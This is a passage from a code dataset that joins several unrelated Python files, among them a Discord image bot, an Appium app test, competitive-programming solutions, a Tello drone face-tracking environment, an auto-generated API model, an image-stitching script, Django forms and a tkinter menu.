are used in this section of the code to account for the fact that users are\n                # likely to enter numbers from 1 to 5 rather than 0 to 4 (max list range)\n                if self.img_list[choice - 1] is not None: \n                    self.selected_image = self.img_list[choice - 1]\n                    self.selected_image.seek(0) #The seek method is used in case the file was sent before. This would mess with the seek position of the file object\n                    await ctx.send(\"Image number \" + str(choice) + \" was successfully selected.\")\n                else: \n                    await ctx.send(\"An unexpected error occurred while retrieving this image. Please select another.\")\n            else:\n                await ctx.send(\"Please enter a valid choice from between 1 to \" + str(self.result_count) + \".\")\n        else:\n            await ctx.send(\"You need to use the !find command to search for a list of images before you can use this command.\")\n    
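\n    # NOTE: find/select and upload below both store the chosen picture as an in-memory BytesIO\n    # in self.selected_image, so the Editor cog can consume either source via get_selected_image().\n    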
@commands.command(name='upload', \n        help=\"Command that can be used to upload an image to be edited.\"\n        \" Please upload only a single image for editing.\"\n        \" If multiple images are uploaded, only the first image will be selected\" \n        \" for editing. Only .jpg, .jpeg and .png files are currently supported.\")\n    async def upload(self, ctx):\n        attachment = None\n        accepted_extension_list = ['.jpg', '.jpeg', '.png']\n        if len(ctx.message.attachments) > 0:\n            attachment = ctx.message.attachments[0]\n            print(\"done\")\n        else:\n            await ctx.send(\"You need to upload an attachment when using this command\")\n            return\n        for extension in accepted_extension_list:\n            if attachment.filename.endswith(extension):\n                image_bytes = BytesIO()\n                await attachment.save(image_bytes)\n                self.selected_image = image_bytes\n                print(self.selected_image)\n                await ctx.send(\"Image upload successful.\")\n                return\n        await ctx.send(\"This filename extension is not supported.\")\n    \n    @commands.command(name='show', help=\"Command used to show the currently selected image.\")\n    async def show(self, ctx):\n        if self.selected_image is not None:\n            print(self.selected_image)\n            await ctx.send(file=discord.File(self.selected_image, 'selected_image.jpg'))\n            self.selected_image.seek(0)\n        else:\n            await ctx.send(\"You need to select an image before using this command.\")\n\n    @commands.command(name='edit', \n        help=\"Command used to load the image editor. An image needs to be\"\n        \" selected before using this command. You will be unable to use the\" \n        \" query and find commands once you use this command.\")\n    async def edit(self,ctx):\n        if self.selected_image is not None:\n            #self.bot.unload_extension(f'cogs.query')\n            self.bot.load_extension(f'cogs.editor')\n            await ctx.send(\"The editor has been loaded. You can use commands like !caption top or !whitespace top to edit your image.\")\n        else:\n            await ctx.send(\"You need to select an image before you can edit it.\")\n    \n    def update_params(self):\n        \"\"\"Updates the parameter string. \n        \n        Checks the entered parameters for errors and updates the params\n        attribute if none are found.\n        \"\"\"\n        if len(self.query.strip()) > 100: return # We enforce a hard limit of 100 characters on search queries.\n        if self.result_count > 5: return # We enforce a 5 image limit on results \n        # to prevent one user from taking up too much bandwidth\n        self.params = {'q': self.query, 'mkt': self.market, 'count' : self.result_count, 'offset': self.offset,'safeSearch' : self.moderation,\n            'minWidth' : self.minDim[0], 'minHeight' : self.minDim[1], 'maxWidth' : self.maxDim[0], 'maxHeight' : self.maxDim[1]}\n    \n    def get_selected_image(self):\n        \"\"\"Returns selected image attribute.\n\n        Used by the Editor cog to retrieve the selected image from the\n        Query cog. \n        \"\"\"\n        return self.selected_image\n\n\ndef setup(bot):\n    bot.add_cog(Query(bot))","repo_name":"moooserstupid/MemeMakerBot","sub_path":"cogs/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":8648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"71295287587","text":"from time import sleep\nfrom appium import webdriver\ndesired_caps={}\ndesired_caps['platformName']='Android'\ndesired_caps['platformVersion']='4.4.2'\ndesired_caps['deviceName']='MI_6'\ndesired_caps['appPackage']='com.ihimee.bwqs'\ndesired_caps['appActivity']='com.himee.LogoActivity'\ndriver=webdriver.Remote('http://127.0.0.1:4723/wd/hub',desired_caps)\n#滑屏\nsleep(5)\nsize=driver.get_window_size()\nwidth=size.get('width')\nheight=size.get('height')\ndriver.swipe(size['width']*0.7,size['height']*0.3,size['width']*0.1,size['height']*0.3,1000)\ndriver.swipe(size['width']*0.7,size['height']*0.3,size['width']*0.1,size['height']*0.3,1000)\n#driver.swipe(size['width']*0.7,size['height']*0.3,size['width']*0.1,size['height']*0.3,1000)\n# driver.swipe(size['width']*0.7,size['height']*0.3,size['width']*0.1,size['height']*0.3,1000)\n# driver.swipe(size['width']*0.7,size['height']*0.3,size['width']*0.1,size['height']*0.3,1000)\n# sleep(2)\n# driver.swipe(size['width']*0.8,size['height']*0.3,size['width']*0.1,size['height']*0.3,1000)\n# driver.swipe(700,500,100,500,1000)\n# driver.swipe(700,500,100,500,1000)\n# driver.swipe(700,500,100,500,1000)\n# driver.swipe(700,500,100,500,1000)\n# driver.swipe(700,500,100,500,1000)\nsleep(2)\n# driver.swipe(700,500,100,500,1000)\ndriver.find_element_by_class_name('android.widget.Button').click()\nsleep(2)\n# driver.find_element_by_id('com.ihimee.bwqs:id/main_tab_settings').click()\nsleep(2)\n#登陆\ndriver.find_element_by_id('com.ihimee.bwqs:id/username_edit').send_keys('zhangkairui1 ')\ndriver.find_element_by_id('com.ihimee.bwqs:id/password_edit').send_keys('123456')\ndriver.find_element_by_id('com.ihimee.bwqs:id/login_btn').click()\nsleep(5)\n#学习模块\ndriver.find_element_by_('com.ihimee.bwqs:id/bottom_nav_icon').click()\nsleep(3)\n#确认按钮\ndriver.find_element_by_id('com.ihimee.bwqs:id/sure_btn').click()\nsleep(2)\ndriver.find_elements_by_class_name('android.widget.RelativeLayout')[0].click()\nsleep(5)\ndriver.find_elements_by_class_name('android.widget.RelativeLayout')[9].click()\nsleep(2)\n# driver.swipe(500,1000,500,100,1000)\n# driver.swipe(500,1000,500,100,1000)\ndriver.swipe(size['width']*0.3,size['height']*0.8,size['width']*0.3,size['height']*0.3,1000)\nsleep(2)\ndriver.tap([(114,1633)])\nsleep(10)\ndriver.tap([(114,1633)])\nsleep(2)\ndriver.find_element_by_id('com.ihimee.bwqs:id/topbar_left_view_btn').click()\nsleep(2)\ndriver.find_element_by_id('com.ihimee.bwqs:id/topbar_left_view_btn').click()\ndriver.find_element_by_id('com.ihimee.bwqs:id/main_tab_settings').click()\na=driver.find_element_by_id('com.ihimee.bwqs:id/user_name').text\nb='张凯瑞zhangkairui'\nif a==b:\n print('pass')\nelse:\n print('fail')\ndriver.quit()","repo_name":"jay521github/Douglas","sub_path":"OnLine/Test/qiangshao.py","file_name":"qiangshao.py","file_ext":"py","file_size_in_byte":2662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"31311983936","text":"class Solution:\n def nearestValidPoint(self, x: int, y: int, points: List[List[int]]) -> int:\n \"\"\"\n i will go through the points in points :\n - then find out whether they are valid or not by compairing their x and y\n - then when ever we find valid calculate their manhattan distance then \n - pair the manhatten distance with index number in a tuple and save it ia a list\n - sort the list based on manhatan distance \n - return the first manhatan distance index\n \"\"\"\n store = []\n for idx in range(len(points)):\n if (points[idx])[0] == x or (points[idx])[1]==y: # then they are valid\n manhatan_distance = (abs((points[idx])[0] - x))+(abs((points[idx])[1]-y))\n store.append((manhatan_distance, idx))\n print(store)\n store = sorted(store, key = lambda item: item[0])\n print(store)\n if store:\n return store[0][1]\n return -1","repo_name":"ruth987/Competitve-programming-A2SV","sub_path":"1779-find-nearest-point-that-has-the-same-x-or-y-coordinate/1779-find-nearest-point-that-has-the-same-x-or-y-coordinate.py","file_name":"1779-find-nearest-point-that-has-the-same-x-or-y-coordinate.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"29402826221","text":"## https://atcoder.jp/contests/atc001/tasks/dfs_a\n\nimport sys\nsys.setrecursionlimit(10000000)\n\nH,W = map(int,input().split())\nc = [list(input()) for i in range(H)]\nfor i in range(H):\n for j in range(W):\n if c[i][j] == \"s\":\n s = (i,j)\n elif c[i][j] == \"g\":\n t = (i,j)\n\n#始点(i,j)から始まるdfs\nseen = [[False]*W for i in range(H)]\ndef dfs(i,j):\n seen[i][j] = True\n\n if 0<=i+1<=H-1 and 0<=j<=W-1 and c[i+1][j] != \"#\":\n if not seen[i+1][j]:\n dfs(i+1,j)\n if 0<=i-1<=H-1 and 0<=j<=W-1 and c[i-1][j] != \"#\":\n if not seen[i-1][j]:\n dfs(i-1,j)\n if 0<=i<= H-1 and 0<=j+1<=W-1 and c[i][j+1] != \"#\":\n if not seen[i][j+1]:\n dfs(i,j+1)\n if 0<=i<=H-1 and 0<=j-1<=W-1 and c[i][j-1] != \"#\":\n if not seen[i][j-1]:\n dfs(i,j-1)\n\ndfs(s[0],s[1])\nif seen[t[0]][t[1]]:\n print(\"Yes\")\nelse:\n print(\"No\")\n\n\n","repo_name":"Yoshifumi-Nakano/atcoder","sub_path":"algorithm/graph_s-t_path.py","file_name":"graph_s-t_path.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"2911894516","text":"from djitellopy import Tello\nimport time\nimport cv2\nimport numpy as np\nfrom aigym import box, seeding\n\n\nclass Drone:\n def __init__(self):\n self.me = Tello()\n self.me.connect()\n self.me.front_back_velocity = 0\n self.me.left_right_velocity = 0\n self.me.up_down_velocity = 0\n self.face_cascade = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n self.eyes_cascade = cv2.CascadeClassifier(\"haarcascade_eye.xml\")\n self.me.yaw_velocity = 0\n self.me.speed = 0\n print(self.me.get_battery())\n self.me.streamoff()\n self.me.streamon()\n self.me.takeoff()\n #self.me.move_up(50)\n\n self.width = 500\n self.height = 500\n self.hei_hf = int(self.height / 9)\n self.state = None\n self.maxspeed = 40\n cv2.waitKey(1)\n print('initialized')\n self.steps_beyond_done = None\n self.observation_space = box.Box(0, 1, shape=(3,), dtype=np.float32)\n self.action_space = box.Box(-1, +1, (3,), dtype=np.float32)\n\n def step(self, action):\n reward = 0\n action = np.clip(action, -1, +1).astype(np.float32)\n prev_x, prev_y, prev_w = self.state\n prev_x = prev_x * self.width\n prev_y = prev_y * self.width\n prev_w = prev_w * self.width\n cv2.waitKey(1)\n\n prev_rem_x = self.width - (prev_x + prev_w)\n prev_diff_x = abs(prev_x - prev_rem_x)\n\n prev_rem_y = self.width - (prev_y + prev_w)\n prev_diff_y = abs(prev_y - prev_rem_y)\n\n curr_w = 0\n curr_y = 0\n curr_x = 0\n done = False\n # print('action', action)\n self.me.send_rc_control(int(action[0] * self.maxspeed), int(action[1] * self.maxspeed),\n int(action[2] * self.maxspeed), 0)\n frame_read = self.me.get_frame_read()\n img = frame_read.frame\n img = cv2.resize(img, (self.width, self.height))\n faces = self.face_cascade.detectMultiScale(img)\n for (x, y, w, h) in faces:\n nframe = img[y:y + h, x:x + w]\n eyes = self.eyes_cascade.detectMultiScale(nframe)\n if len(eyes) > 1:\n # print('state', (x, y, w, h))\n\n curr_w = w\n curr_x = x\n curr_y = y\n self.state = (x / self.width, y / self.width, w / self.width)\n break\n else:\n done = True\n reward = reward - 10.0\n\n if not done:\n rem = self.width - (curr_x + curr_w)\n diff_x = abs(curr_x - rem)\n\n remy = self.width - (curr_y + curr_w)\n diff_y = abs(curr_y - remy)\n\n if (abs(curr_w - int(self.width / 5)) <= 10) and (diff_y < 30) and (diff_x < 30):\n # acceptable range width - (115, 135); y = 50,115;\n # print('perfect')\n reward = reward + 10.0\n else:\n # print('diff', diff)\n if (diff_x > 30) and (diff_x < prev_diff_x):\n reward = reward + (0.003 * (self.width - diff_x))\n elif (diff_y > 30) and (diff_y < prev_diff_y):\n reward = reward + (0.001 * (self.width - diff_y))\n elif curr_w - int(self.width / 5) > 10:\n if curr_w < prev_w:\n reward = reward + 0.2\n else:\n reward = reward - 0.2\n\n return np.array(self.state), reward, done, {}\n\n def render(self, mode='human'):\n cv2.waitKey(1)\n frame_read = self.me.get_frame_read()\n img = frame_read.frame\n img = cv2.resize(img, (self.width, self.height))\n cv2.rectangle(img, (int(self.state[0] * self.width), int(self.state[1] * self.width)), (\n int(self.state[0] * self.width) + int(self.state[2] * self.width),\n int(self.state[1] * self.width) + int(self.state[2] * self.width)),\n (0, 255, 0), 3)\n cv2.imshow('Frame', img)\n\n def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def reset(self):\n self.me.send_rc_control(0, 0, 0, 0)\n cv2.waitKey(1)\n\n while True:\n frame_read = self.me.get_frame_read()\n img = frame_read.frame\n img = cv2.resize(img, 
(self.width, self.height))\n faces = self.face_cascade.detectMultiScale(img)\n # print('faces', faces)\n cv2.waitKey(1)\n if len(faces) > 0:\n (x, y, w, h) = faces[0]\n nframe = img[y:y + h, x:x + w]\n\n eyes = self.eyes_cascade.detectMultiScale(nframe)\n\n if len(eyes) > 1:\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 3)\n self.me.send_rc_control(0, 0, 0, 0)\n self.state = (x / self.width, y / self.width, w / self.width)\n break\n self.me.send_rc_control(0, 0, 0, 30)\n cv2.imshow('Frame', img)\n\n return np.array(self.state)\n\n def close(self):\n self.me.land()\n cv2.destroyAllWindows()\n","repo_name":"SwapnilMad/Autonomous-Face-Tracking-Drone","sub_path":"drone.py","file_name":"drone.py","file_ext":"py","file_size_in_byte":5199,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"70"}
+{"seq_id":"18478658205","text":"# coding: utf-8\n\"\"\"\n Amphora Data\n\n Connect information in real time with Amphora Data. Learn more at https://docs.amphoradata.com # noqa: E501\n\n The version of the OpenAPI document: 0.10.29\n Generated by: https://openapi-generator.tech\n\"\"\"\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom amphora_api_client.configuration import Configuration\n\n\nclass Address(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'street_number': 'str',\n 'street_name': 'str',\n 'municipality_subdivision': 'str',\n 'municipality': 'str',\n 'country_secondary_subdivision': 'str',\n 'country_subdivision': 'str',\n 'postal_code': 'str',\n 'country_code': 'str',\n 'country': 'str',\n 'country_code_iso3': 'str',\n 'freeform_address': 'str',\n 'local_name': 'str'\n }\n\n attribute_map = {\n 'street_number': 'streetNumber',\n 'street_name': 'streetName',\n 'municipality_subdivision': 'municipalitySubdivision',\n 'municipality': 'municipality',\n 'country_secondary_subdivision': 'countrySecondarySubdivision',\n 'country_subdivision': 'countrySubdivision',\n 'postal_code': 'postalCode',\n 'country_code': 'countryCode',\n 'country': 'country',\n 'country_code_iso3': 'countryCodeIso3',\n 'freeform_address': 'freeformAddress',\n 'local_name': 'localName'\n }\n\n def __init__(self,\n street_number=None,\n street_name=None,\n municipality_subdivision=None,\n municipality=None,\n country_secondary_subdivision=None,\n country_subdivision=None,\n postal_code=None,\n country_code=None,\n country=None,\n country_code_iso3=None,\n freeform_address=None,\n local_name=None,\n local_vars_configuration=None): # noqa: E501\n \"\"\"Address - a model defined in OpenAPI\"\"\" # noqa: E501\n if local_vars_configuration is None:\n local_vars_configuration = Configuration()\n self.local_vars_configuration = local_vars_configuration\n\n self._street_number = None\n self._street_name = None\n self._municipality_subdivision = None\n self._municipality = None\n self._country_secondary_subdivision = None\n self._country_subdivision = None\n self._postal_code = None\n self._country_code = None\n self._country = None\n self._country_code_iso3 = None\n self._freeform_address = None\n self._local_name = None\n self.discriminator = None\n\n self.street_number = street_number\n self.street_name = street_name\n self.municipality_subdivision = municipality_subdivision\n self.municipality = municipality\n self.country_secondary_subdivision = country_secondary_subdivision\n self.country_subdivision = country_subdivision\n self.postal_code = postal_code\n self.country_code = country_code\n self.country = country\n self.country_code_iso3 = country_code_iso3\n self.freeform_address = freeform_address\n self.local_name = local_name\n\n @property\n def street_number(self):\n \"\"\"Gets the street_number of this Address. # noqa: E501\n\n\n :return: The street_number of this Address. # noqa: E501\n :rtype: str\n \"\"\"\n return self._street_number\n\n @street_number.setter\n def street_number(self, street_number):\n \"\"\"Sets the street_number of this Address.\n\n\n :param street_number: The street_number of this Address. 
# noqa: E501\n :type: str\n \"\"\"\n\n self._street_number = street_number\n\n @property\n def street_name(self):\n \"\"\"Gets the street_name of this Address. # noqa: E501\n\n\n :return: The street_name of this Address. # noqa: E501\n :rtype: str\n \"\"\"\n return self._street_name\n\n @street_name.setter\n def street_name(self, street_name):\n \"\"\"Sets the street_name of this Address.\n\n\n :param street_name: The street_name of this Address. # noqa: E501\n :type: str\n \"\"\"\n\n self._street_name = street_name\n\n @property\n def municipality_subdivision(self):\n \"\"\"Gets the municipality_subdivision of this Address. # noqa: E501\n\n\n :return: The municipality_subdivision of this Address. # noqa: E501\n :rtype: str\n \"\"\"\n return self._municipality_subdivision\n\n @municipality_subdivision.setter\n def municipality_subdivision(self, municipality_subdivision):\n \"\"\"Sets the municipality_subdivision of this Address.\n\n\n :param municipality_subdivision: The municipality_subdivision of this Address. # noqa: E501\n :type: str\n \"\"\"\n\n self._municipality_subdivision = municipality_subdivision\n\n @property\n def municipality(self):\n \"\"\"Gets the municipality of this Address. # noqa: E501\n\n\n :return: The municipality of this Address. # noqa: E501\n :rtype: str\n \"\"\"\n return self._municipality\n\n @municipality.setter\n def municipality(self, municipality):\n \"\"\"Sets the municipality of this Address.\n\n\n :param municipality: The municipality of this Address. # noqa: E501\n :type: str\n \"\"\"\n\n self._municipality = municipality\n\n @property\n def country_secondary_subdivision(self):\n \"\"\"Gets the country_secondary_subdivision of this Address. # noqa: E501\n\n\n :return: The country_secondary_subdivision of this Address. # noqa: E501\n :rtype: str\n \"\"\"\n return self._country_secondary_subdivision\n\n @country_secondary_subdivision.setter\n def country_secondary_subdivision(self, country_secondary_subdivision):\n \"\"\"Sets the country_secondary_subdivision of this Address.\n\n\n :param country_secondary_subdivision: The country_secondary_subdivision of this Address. # noqa: E501\n :type: str\n \"\"\"\n\n self._country_secondary_subdivision = country_secondary_subdivision\n\n @property\n def country_subdivision(self):\n \"\"\"Gets the country_subdivision of this Address. # noqa: E501\n\n\n :return: The country_subdivision of this Address. # noqa: E501\n :rtype: str\n \"\"\"\n return self._country_subdivision\n\n @country_subdivision.setter\n def country_subdivision(self, country_subdivision):\n \"\"\"Sets the country_subdivision of this Address.\n\n\n :param country_subdivision: The country_subdivision of this Address. # noqa: E501\n :type: str\n \"\"\"\n\n self._country_subdivision = country_subdivision\n\n @property\n def postal_code(self):\n \"\"\"Gets the postal_code of this Address. # noqa: E501\n\n\n :return: The postal_code of this Address. # noqa: E501\n :rtype: str\n \"\"\"\n return self._postal_code\n\n @postal_code.setter\n def postal_code(self, postal_code):\n \"\"\"Sets the postal_code of this Address.\n\n\n :param postal_code: The postal_code of this Address. # noqa: E501\n :type: str\n \"\"\"\n\n self._postal_code = postal_code\n\n @property\n def country_code(self):\n \"\"\"Gets the country_code of this Address. # noqa: E501\n\n\n :return: The country_code of this Address. 
# noqa: E501\n :rtype: str\n \"\"\"\n return self._country_code\n\n @country_code.setter\n def country_code(self, country_code):\n \"\"\"Sets the country_code of this Address.\n\n\n :param country_code: The country_code of this Address. # noqa: E501\n :type: str\n \"\"\"\n\n self._country_code = country_code\n\n @property\n def country(self):\n \"\"\"Gets the country of this Address. # noqa: E501\n\n\n :return: The country of this Address. # noqa: E501\n :rtype: str\n \"\"\"\n return self._country\n\n @country.setter\n def country(self, country):\n \"\"\"Sets the country of this Address.\n\n\n :param country: The country of this Address. # noqa: E501\n :type: str\n \"\"\"\n\n self._country = country\n\n @property\n def country_code_iso3(self):\n \"\"\"Gets the country_code_iso3 of this Address. # noqa: E501\n\n\n :return: The country_code_iso3 of this Address. # noqa: E501\n :rtype: str\n \"\"\"\n return self._country_code_iso3\n\n @country_code_iso3.setter\n def country_code_iso3(self, country_code_iso3):\n \"\"\"Sets the country_code_iso3 of this Address.\n\n\n :param country_code_iso3: The country_code_iso3 of this Address. # noqa: E501\n :type: str\n \"\"\"\n\n self._country_code_iso3 = country_code_iso3\n\n @property\n def freeform_address(self):\n \"\"\"Gets the freeform_address of this Address. # noqa: E501\n\n\n :return: The freeform_address of this Address. # noqa: E501\n :rtype: str\n \"\"\"\n return self._freeform_address\n\n @freeform_address.setter\n def freeform_address(self, freeform_address):\n \"\"\"Sets the freeform_address of this Address.\n\n\n :param freeform_address: The freeform_address of this Address. # noqa: E501\n :type: str\n \"\"\"\n\n self._freeform_address = freeform_address\n\n @property\n def local_name(self):\n \"\"\"Gets the local_name of this Address. # noqa: E501\n\n\n :return: The local_name of this Address. # noqa: E501\n :rtype: str\n \"\"\"\n return self._local_name\n\n @local_name.setter\n def local_name(self, local_name):\n \"\"\"Sets the local_name of this Address.\n\n\n :param local_name: The local_name of this Address. 
# noqa: E501\n :type: str\n \"\"\"\n\n self._local_name = local_name\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(\n map(lambda x: x.to_dict()\n if hasattr(x, \"to_dict\") else x, value))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(\n map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, Address):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, Address):\n return True\n\n return self.to_dict() != other.to_dict()\n","repo_name":"amphoradata/python-sdk","sub_path":"src/sdk/amphora_api_client/models/address.py","file_name":"address.py","file_ext":"py","file_size_in_byte":11719,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"41024914882","text":"import sys\nimport os\nimport re\nfrom skimage import io\nfrom skimage.color import rgb2gray\nfrom skimage.external.tifffile import imsave\nimport numpy as np\nimport pandas as pd\nimport image_processing\nimport stitch_cell_centroid\nimport segmentation\n\nif __name__==\"__main__\":\n\n\tprint(\"Extracting info from segmentation Roi zip...\")\n\tfor i in range(0,5):\n\t\tprint(\"Working on position\", i, \"...\")\n\t\timage_processing.extract_roi_zip(\"RoiSet_Pos%d_real.zip\" % i, \"roi/roi.pos%d.all.txt\" % i, tmp_dir=\"/tmp/pos%d\" % i)\n\n\toffset = image_processing.read_offset(\"offset.txt\")\n\n\tprint(\"Decoupling tiff...\")\n\tfor d in range(0,5):\n\t\tprint(\"Working on position\", d, \"...\")\n\t\timage_processing.decouple_tiff(\"segmentation_staining_1_MMStack_Pos%d.ome.tif\" % d, prefix=\"Pos%d\" % d)\n\n\tprint(\"Stitching staining images...\")\n\tfor channel in [0,4,7]:\n\t\tfor i in range(0,5):\n\t\t\timage_processing.rotate(\"Pos%d.%d.tif\" % (i, channel), \"Pos%d.%d.rotate.tif\" % (i, channel))\n\t\ttimage_by_field = {}\n\t\tfor i in range(0,5):\n\t\t\ttimage_by_field[i] = io.imread(\"Pos%d.%d.rotate.tif\" % (i,channel))\n\t\timage_processing.stitch_image(timage_by_field, offset, outfile=\"Pos.ch%d.joined.tif\" % channel)\n\t\n\tXcen, field = stitch_cell_centroid.read_centroid(\"Cell_centroids.csv\")\n\tXcen2 = np.empty(Xcen.shape, dtype=\"float32\")\n\n\tnew_coord = image_processing.rotate_coordinate(Xcen)\n\tfor i in range(Xcen.shape[0]):\n\t\tXcen2[i, :] = new_coord[i]\n\t\n\tprint(\"Stitching expression data...\")\n\tm = image_processing.subset_cell_index(field, FD=[0,1,2,3,4])\n\tfield, Xcen2 = field[m], Xcen2[m]\n\tXcen_new = image_processing.stitch_coord(Xcen2, field, offset)\n\tfw = open(\"cell.centroid.stitched.pos.all.cells.txt\", \"w\")\n\tfor i in range(Xcen_new.shape[0]):\n\t\tfw.write(\"%d,%d,%.1f,%.1f\\n\" % (i+1, 100, Xcen_new[i,0], Xcen_new[i,1]))\n\tfw.close()\n\n\tprint(\"Stitching segmentations...\")\n\tall_coord = segmentation.read_segmentation(\"roi\", field=[0,1,2,3,4])\n\tby_cell = {}\n\tcur = 0\n\tfw = open(\"roi.stitched.pos.all.cells.txt\", \"w\")\n\tfor pos in range(0,5):\n\t\tnum_cell = max([s[0] for s in all_coord[pos]])\n\t\tfor i,x,y in all_coord[pos]:\n\t\t\tnew_x, new_y = image_processing.rotate_coordinate_one(x, y)\n\t\t\tfinal_x, final_y = image_processing.stitch_coord_one(new_x, new_y, pos, offset)\n\t\t\tfw.write(\"%d,%.1f,%.1f\\n\" % (i+cur, final_x, final_y))\n\t\t\tby_cell.setdefault(i+cur, [])\n\t\t\tby_cell[i+cur].append((int(final_x), int(final_y)))\n\t\tcur+=num_cell\n\tfw.close()\n\n\tprint(\"Aligning segmentation to expression data...\")\n\tfw = open(\"segmentation.to.cell.centroid.map.txt\", \"w\")\n\tseg_keys, points = segmentation.get_centroid(by_cell)\n\tnames = [i+1 for i in range(Xcen_new.shape[0])]\n\tpairs = segmentation.match(points, seg_keys, Xcen_new, names)\n\tfor i,j,d in pairs:\n\t\tfw.write(\"pairs %d %d %.3f\\n\" % (i, j, d))\n\tfw.close()\t\n\n\tfor i in [0,4,7]:\n\t\tprint(\"Tiling joined image of channel\", i, \"...\")\n\t\timage_processing.tile(\"Pos.ch%d.joined.tif\" % i, \"imapr26.%d\" % i, \"map\", zoom=6)\n\n\tprint(\"Preparing expression for explorer...\")\n\tmat = pd.read_table(\"cortex_expression_zscore.csv\", sep=\",\", header=0, index_col=0)\n\timage_processing.multilayer_explorer_expression(mat, \"10k.genes\", 
num_genes_per_file=100)\n\n","repo_name":"TianxiaoNYU/Giotto_viewer","sub_path":"do_all_stitch.py","file_name":"do_all_stitch.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"42351418286","text":"from django import forms\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\nfrom .models import *\n\n\n\nclass DateInput(forms.DateInput):\n input_type = 'date'\n\n\nclass ExpenseForm(forms.ModelForm):\n date = forms.DateTimeField(widget=\n forms.widgets.DateTimeInput\n (format='%Y-%m-%d %H:%M', \n attrs={'class':'myDateClass', 'type':'datetime-local'}))\n\n class Meta:\n model = Expense \n fields =('date','ename','eamount','pay_mode','expense_type')\n widgets = {\n 'date': DateInput(),\n }\n \n\n\nclass RegisterForm(UserCreationForm):\n \n class Meta:\n model = User\n fields = [\"username\", \"email\", \"password1\", \"password2\"]\n\n\n def clean_email(self):\n email = self.cleaned_data.get(\"email\")\n if User.objects.filter(email=email).exists():\n print(email, '***********************')\n raise forms.ValidationError(\"Email is not unique\")\n return email\n\n # def clean_email(self):\n # email = self.cleaned_data['email']\n # (first, second,) = email.split(\"@\")\n # (domain, exn,) = second.split(\".\")\n # if domain != \"tmail\":\n # raise forms.ValidationError(\"Domain must be 'tmail'\")\n \n # if User.objects.filter(email=email).exists():\n # print('######################')\n # raise forms.ValidationError(\"Email is alreday registered \")\n\n # return email \n\n\n # def save(self, commit=True):\n # user = super(RegisterForm, self).save(commit=False)\n # user.fullname = self.cleaned_data[\"fullname\"]\n # user.email = self.cleaned_data[\"email\"]\n # if commit:\n # user.save()\n # return user\n\n\n\n\n","repo_name":"suniljokare/Django_Htmx_project","sub_path":"expense/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"44689248862","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom tkinter import *\nfrom tkinter import ttk\nfrom tkinter import scrolledtext\nfrom views import *\n\n# 主窗口;\n\nwindow = Tk()\nmonty = ttk.LabelFrame(window)\nwindow.title(\"front_end_test\")\nwindow.resizable(width=False, height=False) # 窗口大小不可改变\nwindow.geometry(\"800x600+650+100\")\n\n# 顶级菜单,显示在窗口最上方\nmenubar = Menu(window)\n\n# fmenu可理解为菜单容器,用于add菜单项\n\nfmenu1 = Menu(window, tearoff=False) # tearoff=True 表示这个菜单可以被拖拽出来\nfmenu1.add_separator() # 分割线\nfmenu1.add_command(label='dvbs_11_dynamic_range_awng_max_level', command=lambda: dvbs_11_dynamic_range_awng_max_level(window, monty))\nfmenu1.add_separator() # 分割线\nfmenu1.add_command(label='dvbs_11_dynamic_range_awng_min_level', command=lambda: dvbs_11_dynamic_range_awng_min_level(window, monty))\nfmenu1.add_separator() # 分割线\nfmenu1.add_command(label='dvbs_12_symbol_rate_step')\nfmenu1.add_separator() # 分割线\nfmenu1.add_command(label='dvbs_15_symbol_err_rate')\nfmenu1.add_separator() # 分割线\nfmenu1.add_command(label='dvbs_16_signal_acquisition_frequency_range')\nfmenu1.add_separator() # 分割线\nfmenu1.add_command(label='dvbs_17_signal_tracking_frequency_range')\n\n\nfmenu2 = Menu(window)\nfmenu2.add_separator() # 分割线\nfmenu2.add_command(label='dvbs2_18_dynamic_range_awng_max_level')\nfmenu2.add_separator() # 分割线\nfmenu2.add_command(label='dvbs2_18_dynamic_range_awng_min_level')\nfmenu2.add_separator() # 